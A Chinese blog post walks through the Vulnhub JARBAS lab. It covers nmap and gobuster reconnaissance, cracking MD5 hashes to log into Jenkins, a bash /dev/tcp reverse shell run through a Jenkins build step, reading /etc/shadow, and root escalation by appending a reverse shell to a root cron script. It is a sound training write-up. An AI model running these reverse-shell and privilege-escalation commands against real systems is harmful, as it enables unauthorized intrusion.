前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Vulnhub靶机实操笔记-JARBAS

Vulnhub靶机实操笔记-JARBAS

原创
作者头像
沈少
修改2023-07-02 11:16:41
3060
修改2023-07-02 11:16:41
举报
文章被收录于专栏:靶机实操笔记靶机实操笔记

摘要

Vulnhub靶机实操笔记-JARBAS

涉及知识内容:目录扫描、Hash-identifier识别、Jenkins利用、计划任务内网提权

一、Namp扫描

1、主机存活判断

代码语言:javascript
复制
sudo nmap -sn 192.168.32.0/24

2、快速扫描

以不低于1w的速度快速扫描端口

代码语言:javascript
复制
sudo nmap --min-rate 10000 -p- 192.168.32.135

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

代码语言:javascript
复制
sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.32.135

4、UDP扫描

代码语言:javascript
复制
sudo nmap -sU -p22,80,3306,8080 192.168.32.135

5、Namp的POC扫描

代码语言:javascript
复制
sudo nmap --script=vuln -p22,80,3306,8080 192.168.32.135

二、目录爆破

访问80端口到WEB页面

访问8080端口来到了登陆页面

先对80端口目录爆破

代码语言:javascript
复制
sudo gobuster dir -u http://192.168.32.135 -x txt,jsp,php,zip,sql,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

访问扫描到的access.html提示这是一个安全的凭据,我们吧这些拿去识别解密一下

1、hash-identifier 识别

当不知道当前hash编码方式是什么时可以利用hash-identifier

代码语言:javascript
复制
 hash-identifier '带检测编码'
 
 hash-identifier '5978a63b4654c73c60fa24f836386d87'
 hash-identifier 'f463f63616cb3f1e81ce46b39f882fd5'
 hash-identifier '9b38e2b1e8b12f426b0d208a7ab6cb98'

2、在线解密

通过在线md5解密网站解出来了对应的值,谷歌浏览器搜md5 crack

对“:”后面的编码进行解密

https://hashes.com/zh/decrypt/hash

三、Jenkins利用

1、登陆Jenkins

通过前面解密得到的密码,尝试账户密码的登陆爆破尝试

最终eder/vipsu登陆系统

2、Jenkins拿shell

1、新建项目

选择freestyle project

2、尝试反弹shell

下拉菜单第一项,执行windows批处理命令;第二项执行shell

选择第二项执行shell,并写入shell命令

代码语言:javascript
复制
/bin/bash -i >& /dev/tcp/192.168.32.131/1234 0>&1

3、监听端口

4、执行项目

点击build now执行项目

5、获得shell

四、内网提权

1、系统详情

代码语言:javascript
复制
uname -a #显示系统名、节点名称、操作系统的发行版号、内核版本等等

2、查看当前系统权限

代码语言:javascript
复制
sudo -l

从结果来看用户是没有任何权限的

3、查看系统用户信息

代码语言:javascript
复制
 cat /etc/passwd
 cat /etc/shadow

4、查看定时任务

代码语言:javascript
复制
 cat /etc/crontab #较为常用
 cat /etc/cron.d #比较少用

可以看到箭头处,每五分钟以root的权限去执行CleaningScript.sh这个shell脚本,执行结果是将所有结果丢掉

5、修改计划任务提权

代码语言:javascript
复制
 cat /etc/script/CleaningScript.sh #查看脚本内容
 ls -lia /etc/script/CleaningScript.sh #查看对sh文件的权限
 echo "/bin/bash -i >& /dev/tcp/192.168.32.131/4443 0>&1" >> /etc/script/CleaningScript.sh
 #续写文件CleaningScript.sh将反弹shell命令续写入计划任务脚本内

6、实战补充点--查看ssh是否允许远程登录

查看ssh是否允许远程登录/etc/ssh/sshd_config,查找 #PermitRootLogin 行,如果想允许 root 用户远程登录,将该行的注释符号 # 去掉,并将参数设置为 yes,即 PermitRootLogin yes。如果想禁止 root 用户远程登录,将参数设置为 no,即 PermitRootLogin no。

代码语言:javascript
复制
/etc/ssh/sshd_config

五、靶场下载链接

https://download.vulnhub.com/jarbas/Jarbas.zip

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 摘要
  • 一、Namp扫描
    • 1、主机存活判断
      • 2、快速扫描
        • 3、TCP扫描
          • 4、UDP扫描
            • 5、Namp的POC扫描
            • 二、目录爆破
              • 1、hash-identifier 识别
                • 2、在线解密
                • 三、Jenkins利用
                  • 1、登陆Jenkins
                    • 2、Jenkins拿shell
                      • 1、新建项目
                      • 2、尝试反弹shell
                      • 3、监听端口
                      • 4、执行项目
                      • 5、获得shell
                  • 四、内网提权
                    • 1、系统详情
                      • 2、查看当前系统权限
                        • 3、查看系统用户信息
                          • 4、查看定时任务
                            • 5、修改计划任务提权
                              • 6、实战补充点--查看ssh是否允许远程登录
                              • 五、靶场下载链接
                              相关产品与服务
                              安全攻防对抗服务
                              安全攻防对抗服务(Cybersecurity Attack-Defense Confrontation)基于腾讯安全专家能力及多年的攻防对抗经验构建。面向对安全能力有较高要求的企业用户,在用户授权后,通过实战模拟 APT 攻击的手法,对企业信息化资产以及可能产生危害的安全风险进行测试。通过多维度、多视角的安全攻防对抗,动态检测企业安全防护的整体水位。
                              领券
                              问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档